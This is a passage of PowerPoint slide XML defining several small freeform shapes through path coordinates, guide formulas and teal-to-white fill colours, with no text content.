              <a:gd name="T51" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T69" fmla="*/ 2147483647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
              <a:gd name="T106" fmla="*/ 0 h 84"/>
              <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                <a:moveTo>
                  <a:pt x="22" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10384" name="Freeform 465"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="6229350"/>
            <a:ext cx="38100" cy="146050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T7" fmla="*/ 0 h 65"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T9" fmla="*/ 0 h 65"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T11" fmla="*/ 0 h 65"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T13" fmla="*/ 0 h 65"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 17"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T18" fmla="*/ 0 w 17"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T20" fmla="*/ 0 w 17"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 6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65"/>
              <a:gd name="T59" fmla="*/ 17 w 17"/>
              <a:gd name="T60" fmla="*/ 65 h 6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65">
                <a:moveTo>
                  <a:pt x="17" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10385" name="Freeform 466"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="6230938"/>
            <a:ext cx="31750" cy="103187"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 0 h 46"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 0 h 46"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 0 h 46"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 0 h 46"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 0 h 46"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 0 h 46"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 0 h 46"/>
              <a:gd name="T16" fmla="*/ 0 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T18" fmla="*/ 0 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 46"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647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46"/>
              <a:gd name="T59" fmla="*/ 14 w 14"/>
              <a:gd name="T60" fmla="*/ 46 h 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46">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10386" name="Freeform 467"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1425575" y="6230938"/>
            <a:ext cx="20637" cy="60325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 0 h 27"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 0 h 27"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T16" fmla="*/ 0 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T18" fmla="*/ 0 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T20" fmla="*/ 0 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 2147483647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27"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10387" name="Freeform 468"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="6403975"/>
            <a:ext cx="31750" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 0 h 14"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 0 h 14"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 0 h 14"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 0 h 14"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 0 h 14"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T46" fmla="*/ 0 w 14"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T48" fmla="*/ 0 w 14"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T50" fmla="*/ 0 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 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
              <a:gd name="T100" fmla="*/ 0 h 14"/>
              <a:gd name="T101" fmla="*/ 14 w 14"/>
              <a:gd name="T102" fmla="*/ 14 h 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 h="14">
                <a:moveTo>
                  <a:pt x="7" y="14"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10388" name="Freeform 469"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1584325" y="6403975"/>
            <a:ext cx="15875" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T15" fmla="*/ 0 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 0 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
